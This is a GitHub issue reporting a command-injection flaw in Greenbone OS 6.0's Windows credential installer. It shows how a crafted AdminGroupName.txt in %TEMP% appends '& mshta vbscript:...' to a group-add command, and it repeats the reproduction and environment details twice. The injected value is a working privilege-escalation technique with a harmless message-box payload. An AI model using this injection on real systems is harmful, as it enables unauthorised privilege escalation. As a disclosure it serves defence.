You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Click on the Download Windows Executable icon associated with the new credential
Before running the downloaded installer create a file named AdminGroupName.txt in the %TEMP% directory
set the contents file to be something like:
{administrator's group name} {hostname}{credential username} /add & mshta vbscript:Execute("msgbox ""I could use this for privesc =]"":close") & echo
A real example would be:
Administrators MY-DESKTOP\test /add & mshta vbscript:Execute("msgbox ""I could use this for privesc =]"":close") & echo
Set the read-only attribute in the AdminGroupName.txt file (attrib +R %TEMP%\AdminGroupName.txt)
Run the installer and see a message box pop up.
GVM versions
gsa: (gsad --version)
gvm: (gvmd --version)
openvas: (openvas --version)
gvm-libs:
openvas-smb:
I couldn't run the recommended commands to get the versions.
Environment
Operating system:
DISTRIB_ID="Greenbone OS"
DISTRIB_RELEASE="6.0"
DISTRIB_CODENAME="mephisto"
DISTRIB_DESCRIPTION="Greenbone OS 6.0"
Linux gsm 4.19.0-0.bpo.8-amd64 greenbone/openvas-scanner#1 SMP Debian 4.19.98-1~bpo9+1 (2020-03-09) x86_64 GNU/Linux
Expected behavior
Actual behavior
Steps to reproduce
{administrator's group name} {hostname}{credential username} /add & mshta vbscript:Execute("msgbox ""I could use this for privesc =]"":close") & echo
A real example would be:
Administrators MY-DESKTOP\test /add & mshta vbscript:Execute("msgbox ""I could use this for privesc =]"":close") & echo
GVM versions
gsa: (gsad --version)
gvm: (gvmd --version)
openvas: (openvas --version)
gvm-libs:
openvas-smb:
I couldn't run the recommended commands to get the versions.
Environment
Operating system:
DISTRIB_ID="Greenbone OS"
DISTRIB_RELEASE="6.0"
DISTRIB_CODENAME="mephisto"
DISTRIB_DESCRIPTION="Greenbone OS 6.0"
Linux gsm 4.19.0-0.bpo.8-amd64 greenbone/openvas-scanner#1 SMP Debian 4.19.98-1~bpo9+1 (2020-03-09) x86_64 GNU/Linux
Installation method / source: https://files.greenbone.net/download/VM/gsm-ce-6.0.7.iso
The text was updated successfully, but these errors were encountered: